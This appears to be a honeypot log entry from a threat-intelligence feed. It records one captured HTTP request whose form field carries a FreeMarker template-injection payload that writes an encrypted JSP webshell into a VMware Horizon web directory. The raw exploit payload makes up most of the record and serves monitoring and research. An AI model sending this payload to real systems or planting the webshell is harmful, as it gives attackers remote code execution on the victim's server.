Attack 3966bf46-a82c-4b12-bcc4-206d4fad1dca

Details

ID 3966bf46-a82c-4b12-bcc4-206d4fad1dca
Attack Type elasticsearch
IP Address 75.127.11.24
Username
Password
Client Version Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Country United States
Date 2023-06-03 02:18PM

Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "*/*",
     "Connection": "keep-alive",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
     "Accept-Encoding": "gzip, deflate"
   },
   "hostname": "localhost",
   "form_data": {
     "error": "",
     "deviceType": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/8fMtcyw.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525253C%2525252525252525%2525252525252540page%2525252525252Bimport%252525252525253D%252525252525255C%2525252525252522java.util.%252525252525252A%252525252525252Cjavax.crypto.%252525252525252A%252525252525252Cjavax.crypto.spec.%252525252525252A%252525252525255C%2525252525252522%2525252525252525%252525252525253E%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525253C%2525252525252525%2525252525252521%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bclass%2525252525252BU%2525252525252Bextends%2525252525252BClassLoader%252525252525257B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252BU%2525252525252528ClassLoader%2525252525252Bc%2525252525252529%2525252525252B%252525252525257B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bsuper%2525252525252528c%2525252525252529%252525252525253B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525257D%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bpublic%2525252525252BClass%2525252525252Bg%2525252525252528byte%2525252525252B%252525252525255B%252525252525255Db%2525252525252529%2525252525252B%252525252525257B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Breturn%2525252525252Bsuper.defineClass%2525252525252528b%252525252525252C0%252525252525252Cb.length%2525252525252529%252525252525253B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525257D%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525257D%2525252525252525%252525252525253E%252525252525253C%2525252525252525%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bif%2525252525252B%2525252525252528request.getMethod%2525252525252528%2525252525252529.equals%2525252525252528%252525252525255C%2525252525252522POST%252525252525255C%2525252525252522%2525252525252529%2525252525252529%252525252525257B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252BString%2525252525252Bk%252525252525253D%252525252525255C%2525252525252522e45e329feb5d925b%252525252525255C%2525252525252522%252525252525253B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bsession.putValue%2525252525252528%252525252525255C%2525252525252522u%252525252525255C%2525252525252522%252525252525252Ck%2525252525252529%252525252525253B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252BCipher%2525252525252Bc%252525252525253DCipher.getInstance%2525252525252528%252525252525255C%2525252525252522AES%252525252525255C%2525252525252522%2525252525252529%252525252525253B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bc.init%25252525252525282%252525252525252Cnew%2525252525252BSecretKeySpec%2525252525252528k.getBytes%2525252525252528%2525252525252529%252525252525252C%252525252525255C%2525252525252522AES%252525252525255C%2525252525252522%2525252525252529%2525252525252529%252525252525253B%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252Bnew%2525252525252BU%2525252525252528this.getClass%2525252525252528%2525252525252529.getClassLoader%2525252525252528%2525252525252529%2525252525252529.g%2525252525252528c.doFinal%2525252525252528new%2525252525252Bsun.misc.BASE64Decoder%2525252525252528%2525252525252529.decodeBuffer%2525252525252528request.getReader%2525252525252528%2525252525252529.readLine%2525252525252528%2525252525252529%2525252525252529%2525252525252529%2525252525252529.newInstance%2525252525252528%2525252525252529.equals%2525252525252528pageContext%2525252525252529%252525252525253B%252525252525257D%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252525%252525252525253E%252525252525250A%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%2525252525252B%252525252525253C%2525252525252525out.println%2525252525252528%252525252525255C%2525252525252522e8418d1d706cd73548f9f16f1d55ad6e%252525252525255C%2525252525252522%2525252525252529%2525252525252B%252525252525253B%2525252525252525%252525252525253E\").getBytes())}"
   }
 }
© 2021 threat.gg